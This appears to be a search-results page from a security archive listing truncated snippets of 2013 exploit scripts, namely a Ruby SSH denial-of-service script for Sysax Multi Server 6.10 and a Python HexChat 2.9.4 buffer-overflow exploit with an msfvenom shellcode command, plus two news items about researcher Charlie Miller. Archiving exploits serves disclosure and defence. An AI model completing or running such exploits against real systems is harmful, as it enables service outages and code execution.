7 matches found
Sysax Multi Server 6.10 - SSH Denial of Service
No description provided by source. !/usr/bin/env ruby Sysax Multi Server 6.10 SSH DoS Matt hostess Andreko mandreko at accuvant.com http://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html require 'socket' unless ARGV.length == 2 puts Usage: ruby $0 host port\n exit end packet = 0x0...
HexChat 2.9.4 - Local Exploit
No description provided by source. !/usr/bin/python HexChat 2.9.4 Local Exploit Bug found by Jules Carter @iMulitia Exploit by Matt hostess Andreko mandreko at accuvant.com http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html junk1 = B30 shellcode = msfvenom -p windows/messagebo...
Sysax Multi Server 6.10 SSH Denial Of Service
!/usr/bin/env ruby Sysax Multi Server 6.10 SSH DoS Matt "hostess" Andreko http://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html require 'socket' unless ARGV.length == 2 puts "Usage: ruby $0 host port\n" exit end packet = 0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f, 0xde, 0x5d,...
HexChat 2.9.4 Buffer Overflow
!/usr/bin/python HexChat 2.9.4 Local Exploit Bug found by Jules Carter Exploit by Matt "hostess" Andreko http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html junk1 = "B"30 shellcode = msfvenom -p windows/messagebox EXITFUNC=process BufferRegister=ESP -e x86/alphamixed -f c...
HexChat 2.9.4 - Local Overflow
HexChat 2.9.4 - Local Overflow !/usr/bin/python HexChat 2.9.4 Local Exploit Bug found by Jules Carter Exploit by Matt "hostess" Andreko http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html junk1 = "B"30 shellcode = msfvenom -p windows/messagebox EXITFUNC=process BufferRegister=E...
Researcher Charlie Miller Joins Twitter Security Team
Twitter quietly is assembling a serious security team, with the most recent addition being Charlie Miller, the security researcher known for finding a long line of bugs in the iPhone and other Apple products. Miller, a respected and prolific researcher, will join the social network’s security tea...
Demo of Charlie Miller's iOS Code-Signing Bug
Security researcher Charlie Miller of Accuvant discovered a vulnerability in the Apple iOS software that enables him to use an app he placed in the iTunes App Store to download unsigned code from a remote Web server and run it on any iOS device. In this video, he demonstrates the app and the way...